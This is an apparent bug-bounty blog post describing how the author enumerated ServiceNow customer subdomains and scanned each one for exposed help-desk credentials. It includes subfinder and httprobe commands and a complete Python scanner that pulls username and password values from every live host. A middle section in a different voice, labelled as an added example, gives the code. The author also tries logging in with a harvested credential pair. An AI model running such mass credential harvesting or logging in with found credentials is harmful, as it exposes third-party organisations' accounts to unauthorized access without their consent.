After I read the blog post on PortSwigger about exposed ServiceNow admin credentials, I began to wonder whether all the credentials had been gathered. I set to work without a moment's delay. I have to say that I wasn't aware of how to find the subdomains. All I knew was that there could be login credentials at *.service-now.com/HelpTheHelpdesk.jsdbx. I pictured all the steps in my mind.
I had to find the subdomains (*.service-now.com), then send a GET request to the /HelpTheHelpdesk.jsdbx endpoint and check the response automatically. The hardest part of this process was automating the GET request and checking the response.
After some quick research, I found subfinder and cloned it. I ran the command below.
subfinder -d service-now.com -o subdomains.txt
But there was a problem I didn't know about: not all the subdomains are live, and it is impossible to pick out the live ones manually.
`httprobe` saved the situation. I fed subdomains.txt to httprobe and created a new file called livesubdomains.txt.
How would I send a GET request to the endpoint and check the response? I didn't know. I googled it and wrote my own script with the help of the Python requests library.
I know the code is neither the fastest nor the most efficient, but it works, and that was OK for me. I would appreciate it if you would share your opinions and feedback.
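As an added example (my own code, not the script from the original post), here is one way to do the last two steps of the procedure above: read the live hosts that httprobe produced, request /HelpTheHelpdesk.jsdbx from each, and sort the responses into "no keyword", "empty credentials" and "populated credentials". It uses the standard library's urllib rather than requests so it runs with no dependencies. The exact shape of the JavaScript body (variables named httpUsername and httpPassword with quoted values) is an assumption based on the keywords the post mentions, and the sample bodies in the code are constructed for illustration, not captured from any real host.

```python
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Optional

# Endpoint named in the post. The body format matched below is an assumption:
# something like `var httpUsername = "..."; var httpPassword = "...";`.
ENDPOINT = "/HelpTheHelpdesk.jsdbx"
CRED_RE = re.compile(r'\b(httpUsername|httpPassword)\s*=\s*["\']([^"\']*)["\']')


def parse_helpdesk_response(body: str) -> Optional[Dict[str, str]]:
    """Extract httpUsername/httpPassword from a response body.

    Returns a dict with both keys when both assignments are present, else None.
    """
    found = {name: value for name, value in CRED_RE.findall(body)}
    if "httpUsername" not in found or "httpPassword" not in found:
        return None
    return found


def classify(body: str) -> str:
    """Label a body as 'no-keyword', 'empty' (both values blank) or 'populated'."""
    creds = parse_helpdesk_response(body)
    if creds is None:
        return "no-keyword"
    if creds["httpUsername"] == "" and creds["httpPassword"] == "":
        return "empty"
    return "populated"


def fetch_body(base_url: str, timeout: float = 10.0) -> Optional[str]:
    """GET base_url + ENDPOINT; return the body on HTTP 200, None on any failure."""
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        headers={"User-Agent": "helpdesk-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            if resp.status != 200:
                return None
            return resp.read().decode("utf-8", errors="replace")
    except (urllib.error.URLError, OSError, ValueError):
        return None


def scan(
    base_urls: Iterable[str],
    fetch: Callable[[str], Optional[str]] = fetch_body,
) -> Dict[str, str]:
    """Classify every host; `fetch` is injectable so the logic can be tested offline."""
    results: Dict[str, str] = {}
    for url in base_urls:
        body = fetch(url)
        results[url] = "unreachable" if body is None else classify(body)
    return results


# Constructed sample bodies (not real responses), used for a quick self-check.
SAMPLE_EMPTY = 'var httpUsername = "";\nvar httpPassword = "";\n'
SAMPLE_POPULATED = 'var httpUsername = "svc_user";\nvar httpPassword = "example";\n'
SAMPLE_OTHER = "<html><body>login page</body></html>"


def main(argv) -> int:
    # Usage: python helpdesk_check.py livesubdomains.txt
    # livesubdomains.txt holds one URL per line, as httprobe prints them
    # (e.g. https://foo.service-now.com).
    if len(argv) != 2:
        print(f"usage: {argv[0]} livesubdomains.txt", file=sys.stderr)
        return 2
    with open(argv[1], encoding="utf-8") as fh:
        hosts = [line.strip() for line in fh if line.strip()]
    for url, label in scan(hosts).items():
        if label == "populated":
            print(f"[!] {url}{ENDPOINT}: non-empty credentials")
        else:
            print(f"[-] {url}: {label}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Keeping the parser and the classifier separate from the network call means the matching logic can be checked against constructed bodies before pointing the script at a list of live hosts, and the "empty" bucket makes it easy to see that a host still serves the file even when the values have been cleared.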
I got several responses that included the `httpPassword =` keyword. All except one had empty credentials: httpPassword = "" and httpUsername = "". All the credentials had been deleted except one.
No matter how many times I tried to log in with these credentials, I unfortunately couldn't log in successfully. Nevertheless, I prepared a proper report and sent it.
I am not the person who found that vulnerability; I wish I were. At least I've learnt loads of things. I learn and share as I learn. If you have any feedback, feel free to reach out to me.